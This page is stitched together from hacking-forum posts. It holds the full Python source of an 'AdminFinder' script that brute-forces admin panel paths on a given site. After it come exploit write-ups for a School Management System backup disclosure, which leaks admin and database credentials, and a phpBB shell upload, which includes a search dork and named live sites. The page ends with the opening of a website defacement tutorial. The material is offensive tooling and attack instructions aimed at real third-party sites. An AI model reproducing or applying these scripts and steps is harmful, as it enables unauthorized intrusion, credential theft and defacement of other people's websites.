            admin = "/" + admin
            host = site + admin
            print ("\t [#] Checking " + host + "...")
            connection = httplib.HTTPConnection(site)
            connection.request("GET",admin)
            response = connection.getresponse()
            var2 = var2 + 1
            if response.status == 200:
                var1 = var1 + 1
                print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")
                raw_input("Press enter to continue scanning.\n")
            elif response.status == 404:
                var2 = var2
            elif response.status == 302:
                print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")
            else:
                print "%s %s %s" % (host, " Interesting response:", response.status)
            connection.close()
        print("\n\nCompleted \n")
        print var1, " Admin pages found"
        print var2, " total pages scanned"
        raw_input("The Game Over; Press Enter to Exit")

    if code==3:
        print("\t [+] Scanning " + site + "...\n\n")
        for admin in cfm:
            admin = admin.replace("\n","")
            admin = "/" + admin
            host = site + admin
            print ("\t [#] Checking " + host + "...")
            connection = httplib.HTTPConnection(site)
            connection.request("GET",admin)
            response = connection.getresponse()
            var2 = var2 + 1
            if response.status == 200:
                var1 = var1 + 1
                print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")
                raw_input("Press enter to continue scanning.\n")
            elif response.status == 404:
                var2 = var2
            elif response.status == 302:
                print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")
            else:
                print "%s %s %s" % (host, " Interesting response:", response.status)
            connection.close()
        print("\n\nCompleted \n")
        print var1, " Admin pages found"
        print var2, " total pages scanned"
        raw_input("The Game Over; Press Enter to Exit")

    if code==4:
        print("\t [+] Scanning " + site + "...\n\n")
        for admin in js:
            admin = admin.replace("\n","")
            admin = "/" + admin
            host = site + admin
            print ("\t [#] Checking " + host + "...")
            connection = httplib.HTTPConnection(site)
            connection.request("GET",admin)
            response = connection.getresponse()
            var2 = var2 + 1
            if response.status == 200:
                var1 = var1 + 1
                print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")
                raw_input("Press enter to continue scanning.\n")
            elif response.status == 404:
                var2 = var2
            elif response.status == 302:
                print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")
            else:
                print "%s %s %s" % (host, " Interesting response:", response.status)
            connection.close()
        print("\n\nCompleted \n")
        print var1, " Admin pages found"
        print var2, " total pages scanned"
        raw_input("The Game Over; Press Enter to Exit")

    if code==5:
        print("\t [+] Scanning " + site + "...\n\n")
        for admin in cgi:
            admin = admin.replace("\n","")
            admin = "/" + admin
            host = site + admin
            print ("\t [#] Checking " + host + "...")
            connection = httplib.HTTPConnection(site)
            connection.request("GET",admin)
            response = connection.getresponse()
            var2 = var2 + 1
            if response.status == 200:
                var1 = var1 + 1
                print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")
                raw_input("Press enter to continue scanning.\n")
            elif response.status == 404:
                var2 = var2
            elif response.status == 302:
                print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")
            else:
                print "%s %s %s" % (host, " Interesting response:", response.status)
            connection.close()
        print("\n\nCompleted \n")
        print var1, " Admin pages found"
        print var2, " total pages scanned"
        raw_input("The Game Over; Press Enter to Exit")

    if code==6:
        print("\t [+] Scanning " + site + "...\n\n")
        for admin in brf:
            admin = admin.replace("\n","")
            admin = "/" + admin
            host = site + admin
            print ("\t [#] Checking " + host + "...")
            connection = httplib.HTTPConnection(site)
            connection.request("GET",admin)
            response = connection.getresponse()
            var2 = var2 + 1
            if response.status == 200:
                var1 = var1 + 1
                print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")
                raw_input("Press enter to continue scanning.\n")
            elif response.status == 404:
                var2 = var2
            elif response.status == 302:
                print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")
            else:
                print "%s %s %s" % (host, " Interesting response:", response.status)
            connection.close()
        print("\n\nCompleted \n")
        print var1, " Admin pages found"
        print var2, " total pages scanned"
        raw_input("The Game Over; Press Enter to Exit")
# httplib.HTTPResponse is not an exception class, so the original handler could never
# match; httplib.HTTPException is the base class of the errors this library raises.
except (httplib.HTTPException, socket.error):
    print "\n\t[!] Session Cancelled; Error occurred. Check internet settings"
except (KeyboardInterrupt, SystemExit):
    print "\n\t[!] Session cancelled"

Admin Page Scripts(2)

#Created for coded32 and his teamopenfire. Eliminated some bugs from my last code shared here as Guest.
#Greets To T.O.F and Indishell
#Thanks friends for finding bugs and giving suggestions
#cd directory/to/code
#directory/to/code>python code.py
#improved Error Handling
#Find out useful stuff from www.teamopenfire.com
#"wE aRe gREat inDIans"
import httplib
import socket
import sys
try:
    print "\t################################################################"
    print "\t# www.teamopenfire.com #"
    print "\t# ############### ######## ############ #"
    print "\t# # # ## ## # # #"
    print "\t# ###### ###### ## ## # ######## #"
    print "\t# # # ## ## # # #"
    print "\t# # # ## ## # ##### #"
    print "\t# # # ## ## # ##### #"
    print "\t# # # ## ## # # #"
    print "\t# # # ## ## # # #"
    print "\t# ##### [#] ######## [#] ##### AdminFinder #"
    print "\t# #"
    print "\t# coded by Ajith KP #"
    print "\t# Greets to Coded32 and T.O.F members #"
    print "\t################################################################"
    # var1: candidate paths that answered 200; var2: requests sent in total
    var1=0
    var2=0
    # Candidate paths, one list per server-side technology the target may use
    php = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
        'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php',
        'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
        'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html',
        'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
        'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
        'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php',
        'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
        'bb-admin/index.html','bb-admin/login.html','acceso.php','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php',
        'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
        'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',
        'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
        'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
        'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
        'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
        'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php',
        'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php',
        'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','usuarios/login.php',
        'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php']
    asp = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
        'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
        'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
        'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp',
        'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
        'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
        'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
        'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp',
        'administrator/account.asp','administrator.asp','acceso.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp',
        'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
        'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html',
        'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
        'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
        'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp',
        'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp',
        'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html',
        'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',
        'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
        'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html']
    cfm = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
        'memberadmin/','administratorlogin/','adm/','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm','admin/account.cfm',
        'admin_area/admin.cfm','admin_area/login.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
        'admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm','admin/home.cfm','admin_area/login.html','admin_area/index.html',
        'admin/controlpanel.cfm','admin.cfm','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
        'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
        'admin/cp.cfm','cp.cfm','administrator/index.cfm','administrator/login.cfm','nsw/admin/login.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm',
        'administrator/account.cfm','administrator.cfm','admin_area/admin.html','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm',
        'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm',
        'moderator/admin.cfm','account.cfm','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.cfm','admincontrol.cfm',
        'admin/adminLogin.html','acceso.cfm','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.cfm','adminarea/index.html','adminarea/admin.html',
        'webadmin.cfm','webadmin/index.cfm','webadmin/admin.cfm','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.cfm','moderator.html',
        'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
        'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
        'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.cfm','account.html','controlpanel.html','admincontrol.html',
        'panel-administracion/login.cfm','wp-login.cfm','adminLogin.cfm','admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm',
        'adminarea/admin.cfm','adminarea/login.cfm','panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm',
        'modelsearch/admin.cfm','admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','usuarios/login.cfm',
        'adm/index.cfm','adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm']
    js = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
        'memberadmin/','administratorlogin/','adm/','admin/account.js','admin/index.js','admin/login.js','admin/admin.js','admin/account.js',
        'admin_area/admin.js','admin_area/login.js','siteadmin/login.js','siteadmin/index.js','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
        'admin_area/index.js','bb-admin/index.js','bb-admin/login.js','bb-admin/admin.js','admin/home.js','admin_area/login.html','admin_area/index.html',
        'admin/controlpanel.js','admin.js','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
        'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
        'admin/cp.js','cp.js','administrator/index.js','administrator/login.js','nsw/admin/login.js','webadmin/login.js','admin/admin_login.js','admin_login.js',
        'administrator/account.js','administrator.js','admin_area/admin.html','pages/admin/admin-login.js','admin/admin-login.js','admin-login.js',
        'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.js','modelsearch/login.js','moderator.js','moderator/login.js',
        'moderator/admin.js','account.js','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.js','admincontrol.js',
        'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.js','adminarea/index.html','adminarea/admin.html',
        'webadmin.js','webadmin/index.js','acceso.js','webadmin/admin.js','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.js','moderator.html',
        'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
        'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
        'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.js','account.html','controlpanel.html','admincontrol.html',
        'panel-administracion/login.js','wp-login.js','adminLogin.js','admin/adminLogin.js','home.js','admin.js','adminarea/index.js',
        'adminarea/admin.js','adminarea/login.js','panel-administracion/index.js','panel-administracion/admin.js','modelsearch/index.js',
        'modelsearch/admin.js','admincontrol/login.js','adm/admloginuser.js','admloginuser.js','admin2.js','admin2/login.js','admin2/index.js','usuarios/login.js',
        'adm/index.js','adm.js','affiliate.js','adm_auth.js','memberadmin.js','administratorlogin.js']
    cgi = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
        'memberadmin/','administratorlogin/','adm/','admin/account.cgi','admin/index.cgi','admin/login.cgi','admin/admin.cgi','admin/account.cgi',
        'admin_area/admin.cgi','admin_area/login.cgi','siteadmin/login.cgi','siteadmin/index.cgi','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
        'admin_area/index.cgi','bb-admin/index.cgi','bb-admin/login.cgi','bb-admin/admin.cgi','admin/home.cgi','admin_area/login.html','admin_area/index.html',
        'admin/controlpanel.cgi','admin.cgi','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
        'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
        'admin/cp.cgi','cp.cgi','administrator/index.cgi','administrator/login.cgi','nsw/admin/login.cgi','webadmin/login.cgi','admin/admin_login.cgi','admin_login.cgi',
        'administrator/account.cgi','administrator.cgi','admin_area/admin.html','pages/admin/admin-login.cgi','admin/admin-login.cgi','admin-login.cgi',
        'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.cgi','modelsearch/login.cgi','moderator.cgi','moderator/login.cgi',
        'moderator/admin.cgi','account.cgi','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.cgi','admincontrol.cgi',
        'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.cgi','adminarea/index.html','adminarea/admin.html',
        'webadmin.cgi','webadmin/index.cgi','acceso.cgi','webadmin/admin.cgi','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.cgi','moderator.html',
        'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
        'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
        'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.cgi','account.html','controlpanel.html','admincontrol.html',
        'panel-administracion/login.cgi','wp-login.cgi','adminLogin.cgi','admin/adminLogin.cgi','home.cgi','admin.cgi','adminarea/index.cgi',
        'adminarea/admin.cgi','adminarea/login.cgi','panel-administracion/index.cgi','panel-administracion/admin.cgi','modelsearch/index.cgi',
        'modelsearch/admin.cgi','admincontrol/login.cgi','adm/admloginuser.cgi','admloginuser.cgi','admin2.cgi','admin2/login.cgi','admin2/index.cgi','usuarios/login.cgi',
        'adm/index.cgi','adm.cgi','affiliate.cgi','adm_auth.cgi','memberadmin.cgi','administratorlogin.cgi']
    brf = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
        'memberadmin/','administratorlogin/','adm/','admin/account.brf','admin/index.brf','admin/login.brf','admin/admin.brf','admin/account.brf',
        'admin_area/admin.brf','admin_area/login.brf','siteadmin/login.brf','siteadmin/index.brf','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
        'admin_area/index.brf','bb-admin/index.brf','bb-admin/login.brf','bb-admin/admin.brf','admin/home.brf','admin_area/login.html','admin_area/index.html',
        'admin/controlpanel.brf','admin.brf','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
        'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
        'admin/cp.brf','cp.brf','administrator/index.brf','administrator/login.brf','nsw/admin/login.brf','webadmin/login.brf','admin/admin_login.brf','admin_login.brf',
        'administrator/account.brf','administrator.brf','acceso.brf','admin_area/admin.html','pages/admin/admin-login.brf','admin/admin-login.brf','admin-login.brf',
        'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.brf','modelsearch/login.brf','moderator.brf','moderator/login.brf',
        'moderator/admin.brf','account.brf','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.brf','admincontrol.brf',
        'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.brf','adminarea/index.html','adminarea/admin.html',
        'webadmin.brf','webadmin/index.brf','webadmin/admin.brf','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.brf','moderator.html',
        'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
        'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
        'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.brf','account.html','controlpanel.html','admincontrol.html',
        'panel-administracion/login.brf','wp-login.brf','adminLogin.brf','admin/adminLogin.brf','home.brf','admin.brf','adminarea/index.brf',
        'adminarea/admin.brf','adminarea/login.brf','panel-administracion/index.brf','panel-administracion/admin.brf','modelsearch/index.brf',
        'modelsearch/admin.brf','admincontrol/login.brf','adm/admloginuser.brf','admloginuser.brf','admin2.brf','admin2/login.brf','admin2/index.brf','usuarios/login.brf',
        'adm/index.brf','adm.brf','affiliate.brf','adm_auth.brf','memberadmin.brf','administratorlogin.brf']
    # Reachability check: open one TCP connection to the host before scanning
    try:
        site = raw_input("Web Site for Scan?: ")
        site = site.replace("http://","")
        print ("\tChecking website " + site + "...")
        conn = httplib.HTTPConnection(site)
        conn.connect()
        conn.close()
        print "\t[$] Yes... Server is Online."
    # httplib.HTTPException (not httplib.HTTPResponse, which is not an exception) plus socket errors
    except (httplib.HTTPException, socket.error) as Exit:
        raw_input("\t [!] Oops Error occurred, Server offline or invalid URL")
        exit()
    print "Enter site source code:"
    print "1 PHP"
    print "2 ASP"
    print "3 CFM"
    print "4 JS"
    print "5 CGI"
    print "6 BRF"
    print "\nPress 1 and 'Enter key' for Select PHP\n"
    # int(raw_input()) rather than input(): in Python 2, input() evaluates the typed text as code
    code = int(raw_input("> "))
    if code==1:
        print("\t [+] Scanning " + site + "...\n\n")
        for admin in php:
            admin = admin.replace("\n","")
            admin = "/" + admin
            host = site + admin
            print ("\t [#] Checking " + host + "...")
            # One plain GET per candidate path; only the status code is inspected
            connection = httplib.HTTPConnection(site)
            connection.request("GET",admin)
            response = connection.getresponse()
            var2 = var2 + 1
            if response.status == 200:
                var1 = var1 + 1
                print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")
                raw_input("Press enter to continue scanning.\n")
            elif response.status == 404:
                pass  # nothing at this path
            elif response.status == 302:
                print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")
            else:
                print "%s %s %s" % (host, " Interesting response:", response.status)
            connection.close()
        print("\n\nCompleted \n")
        print var1, " Admin pages found"
        print var2, " total pages scanned"
        raw_input("[/] The Game Over; Press Enter to Exit")
    if code==2:
        print("\t [+] Scanning " + site + "...\n\n")
        for admin in asp:
            admin = admin.replace("\n","")
            admin = "/" + admin
            host = site + admin
            print ("\t [#] Checking " + host + "...")
            connection = httplib.HTTPConnection(site)
            connection.request("GET",admin)
            response = connection.getresponse()
            var2 = var2 + 1
            if response.status == 200:
                var1 = var1 + 1
                print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")
                raw_input("Press enter to continue scanning.\n")
            elif response.status == 404:
                pass
            elif response.status == 302:
                print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")
            else:
                print "%s %s %s" % (host, " Interesting response:", response.status)
            connection.close()
        print("\n\nCompleted \n")
        print var1, " Admin pages found"
        print var2, " total pages scanned"
        raw_input("The Game Over; Press Enter to Exit")
    if code==3:
        print("\t [+] Scanning " + site + "...\n\n")
        for admin in cfm:
            admin = admin.replace("\n","")
            admin = "/" + admin
            host = site + admin
            print ("\t [#] Checking " + host + "...")
            connection = httplib.HTTPConnection(site)
            connection.request("GET",admin)
            response = connection.getresponse()
            var2 = var2 + 1
            if response.status == 200:
                var1 = var1 + 1
                print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")
                raw_input("Press enter to continue scanning.\n")
            elif response.status == 404:
                pass
            elif response.status == 302:
                print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")
            else:
                print "%s %s %s" % (host, " Interesting response:", response.status)
            connection.close()
        print("\n\nCompleted \n")
        print var1, " Admin pages found"
        print var2, " total pages scanned"
        raw_input("The Game Over; Press Enter to Exit")
    if code==4:
        print("\t [+] Scanning " + site + "...\n\n")
        for admin in js:
            admin = admin.replace("\n","")
            admin = "/" + admin
            host = site + admin
            print ("\t [#] Checking " + host + "...")
            connection = httplib.HTTPConnection(site)
            connection.request("GET",admin)
            response = connection.getresponse()
            var2 = var2 + 1
            if response.status == 200:
                var1 = var1 + 1
                print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")
                raw_input("Press enter to continue scanning.\n")
            elif response.status == 404:
                pass
            elif response.status == 302:
                print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")
            else:
                print "%s %s %s" % (host, " Interesting response:", response.status)
            connection.close()
        print("\n\nCompleted \n")
        print var1, " Admin pages found"
        print var2, " total pages scanned"
        raw_input("The Game Over; Press Enter to Exit")
    if code==5:
        print("\t [+] Scanning " + site + "...\n\n")
        for admin in cgi:
            admin = admin.replace("\n","")
            admin = "/" + admin
            host = site + admin
            print ("\t [#] Checking " + host + "...")
            connection = httplib.HTTPConnection(site)
            connection.request("GET",admin)
            response = connection.getresponse()
            var2 = var2 + 1
            if response.status == 200:
                var1 = var1 + 1
                print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")
                raw_input("Press enter to continue scanning.\n")
            elif response.status == 404:
                pass
            elif response.status == 302:
                print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")
            else:
                print "%s %s %s" % (host, " Interesting response:", response.status)
            connection.close()
        print("\n\nCompleted \n")
        print var1, " Admin pages found"
        print var2, " total pages scanned"
        raw_input("The Game Over; Press Enter to Exit")
    if code==6:
        print("\t [+] Scanning " + site + "...\n\n")
        for admin in brf:
            admin = admin.replace("\n","")
            admin = "/" + admin
            host = site + admin
            print ("\t [#] Checking " + host + "...")
            connection = httplib.HTTPConnection(site)
            connection.request("GET",admin)
            response = connection.getresponse()
            var2 = var2 + 1
            if response.status == 200:
                var1 = var1 + 1
                print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")
                raw_input("Press enter to continue scanning.\n")
            elif response.status == 404:
                pass
            elif response.status == 302:
                print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")
            else:
                print "%s %s %s" % (host, " Interesting response:", response.status)
            connection.close()
        print("\n\nCompleted \n")
        print var1, " Admin pages found"
        print var2, " total pages scanned"
        raw_input("The Game Over; Press Enter to Exit")
except (httplib.HTTPException, socket.error):
    print "\n\t[!] Session Cancelled; Error occurred. Check internet settings"
except (KeyboardInterrupt, SystemExit):
    print "\n\t[!] Session cancelled"
  • School Management System 1.0 Password / Backup Disclosure

    #######################################################
    # Exploit Title: School Management System v 1.0 Remote Create SQL &amp; Files Backup
    # Date: 08/08/2012                         
    # Author: L0n3ly-H34rT
    # Homepage: http://se3c.tk/
    # Contact: l0n3ly_h34rt@hotmail.com
    # Software Link: http://nigeriasocialforum.org/DSM1.0.zip### Tested on: Linux/Windows                                                                           ####################################################
    # P.O.C :
    1- If you run this file in browser e.g. :
    http://127.0.0.1/DSM1.0/backup/processbackup.php
    is create backup in same folder e.g. :
    http://127.0.0.1/DSM1.0/backup/RecordManager.sql
    when you download it , search in file "INSERT INTO adminstaff" and you see like this :
    INSERT INTO adminstaff VALUES("System","Admin","","","7","5","","","","","","","","000","","","17","2007-05-22","17","000000","Admin","Active","","0","Grant","Grant","Grant","Grant","Grant","Grant","Grant","Grant","Grant","Grant","Grant","000","System.A","0","2012-08-08 11:52:13","","Grant","Grant","");
    Username : System.A
    Password : 000000
    ------------------------------------------------------
    2- If you open this file in the browser, e.g.:
    http://127.0.0.1/DSM1.0/createzip.php
    it creates a backup in the same folder, e.g.:
    http://127.0.0.1/DSM1.0/backup/RecordManager.zip
    When you download it, extract the archive and open the file "Connections/drsa.php" to get the database information:
    $hostname_drsa = "localhost:3306";$database_drsa = "dsm";$username_drsa = "root";$password_drsa = "000000";
    # Greetz to my friendz

    phpBB uploadpic.php Shell Upload

    ##################################################################


    ##################################################################

    [+] Exploit Title : PHP BB Forum Remote File Uploader

    [+] Google Dork   : inurl:uploadpic.php intext:Powered by phpBB

    [+] Author        : Mr.XpR

    [+] Version       : All Version

    [+] Contact : No0PM@yahoo.com

    [+] Researcher Team : IRaNHaCK Security Team

    [+] Bug Level     : RFU (Sql)

    [+] Test          : 7 , Linux Back Track

    ##################################################################


    [+]Exploit

       [-] http://Site.CoM/uploadpic.php

    [+] Info : Uploadshell ((  Sh3ll.php.jpg )) or change log with TamperData To Sh3ll.php

    [+]Load Shell

       [-] http://xxxxxxxx.de/[folder]/Sh3ll.php

    [+]Example :

       [-] http://crazy-growers.de/uploadpic.php
       [-] http://www.povej.net/forum/uploadpic.php
       [-] More In Google ...


    Persian Gulf For Ever - Tnx To all Persian Hackerz

    Bax:

    Siamak Black - UnknowN - Farbod ezrael - Hellboy - Samim.s - Sianor - IRH - IRBH - IRIST - All IRanian Hackers

    13 STEPS TO HACKING A WEBSITE OR DEFACEMENT

    Today's discussion is on "How to deface websites using SQL injection and PHP shell code scripting".. Today I will show you the 100% working method for hacking websites and then defacing them...


    Note: I and This Blog is Not responsible for any Misuse of these Tutorials. These are Just for Educational Purposes...So Don't Misuse Them!


    FIRST OF ALL YOU SHOULD KNOW WHAT IS DEFACEMENT??


    Defacing a website simply means that we replace the index.html file of a site with our own file. Now all the users that open it will see our page (i.e. the one uploaded by us).

    For defacing a website, the three things that you need most are:

    1. SQL Injection(For analyzing website loops)

    2. Admin Password

    3. Shell Script (for getting Admin Controls)

    Now Lets Start the Tutorial:


    First of all I would like to say that I have taken some part of the SQL injection tutorial from my previous posts and from the site http://www.milw0rm.com/. Most of the part is written by me, so if you have any doubts I will clear them....


    1. Finding the Target and the Admin Password


    First of all we must find our target website. I have collected a lot of dorks, i.e. the vulnerability points of websites. Some Google searches can be utilized to find vulnerable websites.. Below are examples of some queries..

    Examples: Open the Google and copy paste these queries...

